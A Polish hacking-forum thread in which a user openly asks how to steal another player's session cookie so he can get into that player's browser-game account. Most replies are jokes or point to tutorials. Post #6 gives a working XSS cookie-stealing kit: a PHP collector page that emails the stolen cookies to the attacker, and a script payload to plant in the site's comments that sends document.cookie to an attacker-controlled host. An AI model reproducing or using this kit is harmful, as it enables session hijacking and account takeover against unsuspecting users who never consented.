Pokaż wyniki 1 do 7 z 7

Temat: jak ukraść komuś ciacho?

  1. #1
    Zarejestrowany
    Sep 2008
    Postów
    2

    Domyślnie jak ukraść komuś ciacho?

    Cel jest prosty.. chce wbić się na 10 sekund na konto gościa w jednej z wielu gier przeglądarkowych. TQM pisał, że są dodatki, ale chyba nie do końca zrozumiałem, albo nie potrafię znaleźć dodatku zwijającego komuś ciacho.

    Jestem nobem jeśli chodzi o hacking, ale wiem już kilka rzeczy:
    1. Wiem jak edytować ciacho w moim FF.
    2. Sprawdzilem również masę dodatków do FF i wiem jak podmienić ciacho
    3. Rozumiem filmik http://milw0rm.com/video/watch.php?id=30 (a przynajmniej tak mi się wydaje)

    Szukam od kilku dni informacji na temat ataków XSS. Może ktoś mnie poprowadzi za rączkę (albo chociaż pałą między oczy zdzieli) żebym szukał w dobrym kierunku? Jak gościowi który siedzi przed przeglądarką i rypie w tą grę zwinąć SID
    Z góry dzięki za pomoc.

  2. #2
    ryniek jest offline while 1: os.fork()
    Zarejestrowany
    Jan 2008
    Skąd
    tutej!
    Postów
    233

    Domyślnie

    Skorzystaj z video-artów Unknowa z uw-team.org . Powinieneś umieć JavaScript oraz PHP, choć html'owe noobki też się bawią w XSS.

  3. #3
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    Zaopatrz sie w kominiarke ,pod przykryciem nocy mozesz buchnac komus ciacho!...g00gl3
    War, war never changes.

  4. #4
    Zarejestrowany
    Sep 2008
    Postów
    2

    Domyślnie

    Dzięki za radę GSG.
    Udalo się na prostym przykładzie. Teraz kolejny kłopot jak sprawdzić jakie filrty ma stronka z grą? jak sprawdzić w jaki sposób zmodyfikować składnię kodu tak aby działała na kontrotnej stronce?

  5. #5
    ryniek jest offline while 1: os.fork()
    Zarejestrowany
    Jan 2008
    Skąd
    tutej!
    Postów
    233

    Domyślnie

    Cytat Napisał maati1980 Zobacz post
    Dzięki za radę GSG.
    Udalo się na prostym przykładzie. Teraz kolejny kłopot jak sprawdzić jakie filrty ma stronka z grą? jak sprawdzić w jaki sposób zmodyfikować składnię kodu tak aby działała na kontrotnej stronce?
    musisz się dowiedzieć z czego owa stronka się składa. Jak jest zrobiona np. w JS+PHP+AJAX to musisz poszukać info w google na temat zabezpieczania portali poprzez skrypty JS+PHP+AJAX i filtrowanie przesyłanych danych za pomocą skryptów napisanych w tych językach. Ogólnie zainteresuj się JS'em AJAX'em i PHP; no i może jeszcze Flashem. No i o protokołach filtrowania danych na www Duuuużo teorii.
    Ostatnio edytowane przez ryniek : 09-12-2008 - 15:49

  6. #6
    Zarejestrowany
    Jan 2007
    Postów
    18

    Domyślnie

    Mozesz uzyc XSS =D tylko jest jeden warunek... ta strona musi byc na nia podatna.. =D
    Do rzeczy =D
    Robisz sobie serwer swoj wlasny np. w serwisie 110mb.com.
    robisz plik tekstowy ktory nazywasz cookie.php
    w nim ma sie znajdowac taki kod:
    Kod:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title>Błąd</title>
    <style type="text/css">
    <!--
    body,td,th {
       color: #FFFFFF;
    }
    body {
       background-color: #000000;
    }
    -->
    </style></head>
    <? mail('[email protected]', 'Ciacha skradzione', $cookies); ?>
    <body>
    <h2><strong>Błąd</strong> - <strong>Brak dostępu</strong> for <? echo $_SERVER["REMOTE_ADDR"]; ?></h2>
    </body>
    </html>
    a na stronke np. w komentarzu czy cos takiego wklepujesz taki kod:
    Kod:
    <script>
    window.open("http://www.Hax0r.com/cookie.php?cookies="+document.cookie);
    </script>
    www.HaX0r.com to oczywiscie serwer czy strona zalozona przez ciebie =D
    i to wszystko =D

  7. #7
    Zarejestrowany
    Jun 2007
    Postów
    13

    Domyślnie

    wchodzisz do cukierni, mówisz ze to napad i że chcesz im ukraść ciacho, spytaj czy maja ciastka korzenne to są tzw root cookies czyli ciasteczka roota, dzięki nim przejmiesz calą siec cukierni.
    brak opisu

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj